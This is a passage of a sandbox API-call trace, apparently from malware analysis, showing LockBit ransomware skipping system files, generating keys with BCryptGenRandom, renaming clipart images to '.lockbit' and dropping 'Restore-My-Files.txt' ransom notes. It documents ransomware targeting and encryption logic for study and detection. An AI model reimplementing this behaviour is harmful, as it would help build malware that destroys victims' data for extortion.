(lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0167.979] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0167.980] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00601G.GIF.lockbit") returned 72 [0167.980] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00601G.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph00601g.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0167.980] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.980] malloc (_Size=0x40068) returned 0x1ff1e60 [0167.980] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1577) returned 1 [0167.981] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.981] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0167.981] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.981] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0167.981] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.986] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00601G.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00601G.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.986] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.986] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.987] free (_Block=0x1fa2ed8) [0167.987] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00601G.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.987] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.987] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.988] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe86e3d00, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x5a3d9150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe86e3d00, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x8628, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH00780U.BMP", cAlternateFileName="")) returned 1 [0167.988] lstrcmpiW (lpString1=".", lpString2="PH00780U.BMP") returned -1 [0167.988] lstrcmpiW (lpString1="..", lpString2="PH00780U.BMP") returned -1 [0167.988] PathFindExtensionW (pszPath="PH00780U.BMP") returned=".BMP" [0167.988] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0167.988] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0167.988] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0167.988] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0167.988] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0167.989] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0167.989] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0167.989] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH00780U.BMP") returned 1 [0167.990] lstrcmpiW (lpString1="ntldr", lpString2="PH00780U.BMP") returned -1 [0167.990] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH00780U.BMP") returned -1 [0167.990] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH00780U.BMP") returned -1 [0167.990] lstrcmpiW (lpString1="autorun.inf", lpString2="PH00780U.BMP") returned -1 [0167.990] lstrcmpiW (lpString1="thumbs.db", lpString2="PH00780U.BMP") returned 1 [0167.990] lstrcmpiW (lpString1="iconcache.db", lpString2="PH00780U.BMP") returned -1 [0167.990] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.990] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00780U.BMP") returned=".BMP" [0167.990] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0167.990] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0167.990] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0167.991] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0167.991] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00780U.BMP.lockbit") returned 72 [0167.991] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00780U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph00780u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.992] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.992] malloc (_Size=0x40068) returned 0x3e70008 [0167.992] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=34344) returned 1 [0167.992] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.993] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0167.993] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.993] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0167.993] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0168.010] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00780U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00780U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.010] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.010] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.012] free (_Block=0x1fa2ed8) [0168.012] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00780U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.012] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.012] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.012] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c100, ftCreationTime.dwHighDateTime=0x1bd4e55, ftLastAccessTime.dwLowDateTime=0x5a3d9150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x45c100, ftLastWriteTime.dwHighDateTime=0x1bd4e55, nFileSizeHigh=0x0, nFileSizeLow=0x7e90, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01035U.BMP", cAlternateFileName="")) returned 1 [0168.012] lstrcmpiW (lpString1=".", lpString2="PH01035U.BMP") returned -1 [0168.012] lstrcmpiW (lpString1="..", lpString2="PH01035U.BMP") returned -1 [0168.012] PathFindExtensionW (pszPath="PH01035U.BMP") returned=".BMP" [0168.013] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.013] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.013] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.013] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.013] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.014] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.014] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.014] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01035U.BMP") returned 1 [0168.015] lstrcmpiW (lpString1="ntldr", lpString2="PH01035U.BMP") returned -1 [0168.015] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01035U.BMP") returned -1 [0168.015] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01035U.BMP") returned -1 [0168.015] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01035U.BMP") returned -1 [0168.015] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01035U.BMP") returned 1 [0168.015] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01035U.BMP") returned -1 [0168.015] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.015] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01035U.BMP") returned=".BMP" [0168.015] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.015] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.015] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.015] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.015] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.015] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.015] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.015] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.015] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.015] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.015] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.015] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.015] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.015] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.015] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.015] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.016] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.016] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.016] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.016] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.016] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.016] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.016] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.016] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.016] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.016] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.016] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.016] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.016] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01035U.BMP.lockbit") returned 72 [0168.016] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01035U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01035u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0168.021] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.021] malloc (_Size=0x40068) returned 0x3df0008 [0168.021] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32400) returned 1 [0168.021] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.021] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0168.021] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.022] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0168.022] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0168.024] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01035U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01035U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.024] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.024] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.025] free (_Block=0x1fa2ed8) [0168.025] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01035U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.025] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.025] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.025] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x211bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01046J.JPG", cAlternateFileName="")) returned 1 [0168.026] lstrcmpiW (lpString1=".", lpString2="PH01046J.JPG") returned -1 [0168.026] lstrcmpiW (lpString1="..", lpString2="PH01046J.JPG") returned -1 [0168.026] PathFindExtensionW (pszPath="PH01046J.JPG") returned=".JPG" [0168.026] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0168.026] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0168.026] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0168.026] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0168.026] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0168.026] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0168.026] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0168.026] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0168.026] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0168.026] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0168.026] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0168.026] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0168.026] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0168.026] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0168.026] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0168.026] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0168.026] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0168.026] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0168.026] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0168.026] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0168.026] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0168.026] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0168.026] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0168.027] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0168.027] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.027] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0168.027] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0168.027] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0168.027] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0168.027] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0168.027] lstrcmpiW (lpString1=".msc", lpString2=".JPG") 